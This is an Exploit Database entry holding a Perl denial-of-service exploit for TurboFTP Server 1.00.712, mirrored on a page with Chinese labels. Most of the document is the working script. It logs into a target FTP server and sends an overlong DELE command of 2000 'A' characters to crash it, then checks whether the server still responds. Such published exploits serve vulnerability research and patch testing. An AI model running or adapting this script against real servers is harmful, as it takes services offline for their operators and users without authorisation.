TurboFTP Server 1.00.712 – Remote Denial of Service

• Exploit Database
• 14 阅读

• 作者： corelanc0d3r
  日期： 2010-01-13
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11131/

• # Exploit Title : TurboFTP Server 1.00.712 Remote DoS
  # Date: 30 december 2009
  # Author: corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
  # Bug found by: corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
  # Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe
  # Version : 1.00.712
  # Issue fixed in: 1.00.720
  # OS: Windows
  # Tested on : XP SP3 En (VirtualBox)
  # Type of vuln: DoS
  # Greetz to : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse
  #
  # Script provided 'as is', without any warranty.
  # Use for educational purposes only.
  #
  #
  # Code :
  print "|------------------------------------------------------------------|\n";
  print "| __ __ |\n";
  print "| _________________/ /___ _____ / /________ _____ ___|\n";
  print "|/ ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
  print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n";
  print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n";
  print "||\n";
  print "| http://www.corelan.be:8800 |\n";
  print "||\n";
  print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
  print "[+] DoS exploit for TurboFTP Server 1.00.712 \n";
  
  use IO::Socket; 
  
  if ($#ARGV ne 3) { 
  print "\nusage: $0 <targetip> <targetport> <user> <password>\n"; 
  exit(0); 
  } 
  
  my $user=$ARGV[2];
  my $pass=$ARGV[3];
  
  print " [+] Preparing DoS payload\n";
  my $payload = "A" x 2000;
  print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n";
  $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
  PeerPort => $ARGV[1], 
  Proto=> 'tcp'); 
  
  $ftp = <$sock> || die " [!] *** Unable to connect ***\n"; 
  print " ** $ftp";
  $ftp = <$sock>;
  print " ** $ftp";
  print " [+] Logging in (user $user)\n";
  print $sock "USER $user\r\n"; 
  $ftp = <$sock>;
  print " ** $ftp";
  print $sock "PASS $pass\r\n"; 
  $ftp = <$sock>;
  print " ** $ftp";
  print " [+] Sending payload\n";
  print $sock "DELE ".$payload."\r\n";
  $ftp = <$sock>;
  print " ** $ftp";
  print " [+] Payload sent, now checking FTP server state\n";
  $sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
  PeerPort => $ARGV[1], 
  Proto=> 'tcp'); 
  my $ftp2 = <$sock2> || die " [+] DoS successful\n";
  print " [!] DoS did not seem to work\n";
  print " ** $ftp2\n";